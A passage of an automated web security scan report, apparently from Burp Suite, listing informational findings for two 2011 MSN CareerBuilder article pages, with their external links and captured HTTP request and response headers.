</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<BR><a href=http://www.zap2it.com/ class="art">Zap2it</a>
...[SNIP]...
</STRONG> <a href=http://www.bing.com/search?q=tiger+mom&go=&form=msnena class="art">'Tiger Mother'</a>
...[SNIP]...
<DIV id=modTwitterPromo><a href=http://twitter.com/msntv class="altlink"><IMG border=0 alt=Twitter src="http://entimg.msn.com/i/mompopculture/2/btn_twitterPromo.jpg" width=300 height=61>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.231. http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

Issue detail

The page was loaded from a URL containing a query string:

http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/msn
http://articles.redacted/video/default.aspx?from=en-us_msnhp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://blstc.redacted/br/gbl/lg/1/t/msft.png
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.msn.com/mopsdk/standard/careers/msnshell.aspx&rf=
http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath
http://careers.redacted/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off
http://digg.com/img/digg-it-tiny-submit.gif
http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off
http://download.live.com/?sku=messenger
http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://health.redacted/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836
http://hotmail.redacted/
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://images.del.icio.us/static/img/delicious.small.gif
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif
http://img.icbdr.com/images/pixel.gif
http://img.icbdr.com/v11.89/Common/js/cbatlascore.js
http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js
http://img.icbdr.com/v11.89/css/cbglobal.css
http://img.icbdr.com/v11.89/css/msn_full.css
http://img.icbdr.com/v11.89/css/msncareeradvice.css
http://latino.redacted/
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314
http://money.redacted/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.empleoscb.com/
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalcareers.112.2o7.net/b/ss/msnportalcareers/1/H.1--NS/0
http://music.redacted/
http://my.redacted/
http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1
http://realestate.redacted/
http://realestate.redacted/article.aspx?cp-documentid=27225933
http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off
http://rss.redacted/
http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif
http://sp.reddit.com/reddithead4.gif
http://spaces.live.com/BlogIt.aspx?Title=Excuse-Free Time Off&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js
http://specials.redacted/alphabet.aspx
http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif
http://thebubble.redacted/
http://today.msnbc.msn.com/
http://tv.redacted/
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=AP
http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc
http://www.delish.com/
http://www.delish.com/food-fun/best-burgers
http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&t=Excuse-Free Time Off
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3032619/ns/nightly_news/
http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp
http://www.myhomeredacted/
http://www.rhi.com/
http://www.stumbleupon.com/images/icon_su.gif
http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58392
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=24c91384a1e04a54846bef9dfe30c9a9-349642136-wu-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C84277751A6FC5FDDCEDB3DE162DD8C2B86D6AA3B4A5DE5C92A7E08B60EBA426E3E7821B419A826DD78A; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:56 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR31
Date: Sat, 29 Jan 2011 23:48:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msncareeradvice.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate & Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">

            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
</select>
                                <img src="http://img.icbdr.com/images/pixel.gif" id="qsbNEW_Img1" width="1" hspace="1" height="10" />
                            </td>
...[SNIP]...
</em><a href="http://www.rhi.com/"><em>
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off"> <img border=0 src="http://www.stumbleupon.com/images/icon_su.gif" alt="StumbleUpon"> Stumble It!</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&t=Excuse-Free Time Off"> <img border=0 src="http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif" alt="Facebook"> Facebook</a>
...[SNIP]...
<li><a href="http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off"> <img border=0 src="http://images.del.icio.us/static/img/delicious.small.gif" alt="del.icio.us"> del.icio.us</a>
...[SNIP]...
<li><a href="http://spaces.live.com/BlogIt.aspx?Title=Excuse-Free Time Off&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js"> <img border=0 src="http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif" alt="Live Spaces"> Live Spaces</a>
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off"> <img border=0 src="http://digg.com/img/digg-it-tiny-submit.gif" alt="Digg"> Digg It!</a>
...[SNIP]...
<li><a href="http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js&title=Excuse-Free Time Off"> <img border=0 src="http://sp.reddit.com/reddithead4.gif" alt="Reddit"> reddit</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif" border="0" style="margin-top: 2px;" /><a id="hlPrinterLinkNEW" onclick="javascript:window.open('/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod&pf=true', 'printerfriendly', 'wid
...[SNIP]...
<a href="mailto:?body=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1302&catid=js"><img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif" border="0" /> E-mail</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px; margin-top: 4px !ie; _margin-top: 0;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif" border="0" style="float: left; margin-top: 5px;" />
        <a onClick="popupDiscuss();" style="cursor: pointer;">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />


<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
</center>
<iframe scrolling="no" width="300" height="250" marginheight="0" marginwidth="0" frameborder="0" framespacing="0" src="http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1"></iframe>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.232. http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

Issue detail

The page was loaded from a URL containing a query string:

http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/msn
http://articles.redacted/video/default.aspx?from=en-us_msnhp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://blstc.redacted/br/gbl/lg/1/t/msft.png
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.msn.com/mopsdk/standard/careers/msnshell.aspx&rf=
http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath
http://careers.redacted/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss
http://digg.com/img/digg-it-tiny-submit.gif
http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1391&catid=js&title=9 Questions You Should Ask Your Boss
http://download.live.com/?sku=messenger
http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://health.redacted/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836
http://hotmail.redacted/
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://images.del.icio.us/static/img/delicious.small.gif
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif
http://img.icbdr.com/images/pixel.gif
http://img.icbdr.com/v11.89/Common/js/cbatlascore.js
http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js
http://img.icbdr.com/v11.89/css/cbglobal.css
http://img.icbdr.com/v11.89/css/msn_full.css
http://img.icbdr.com/v11.89/css/msncareeradvice.css
http://latino.redacted/
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
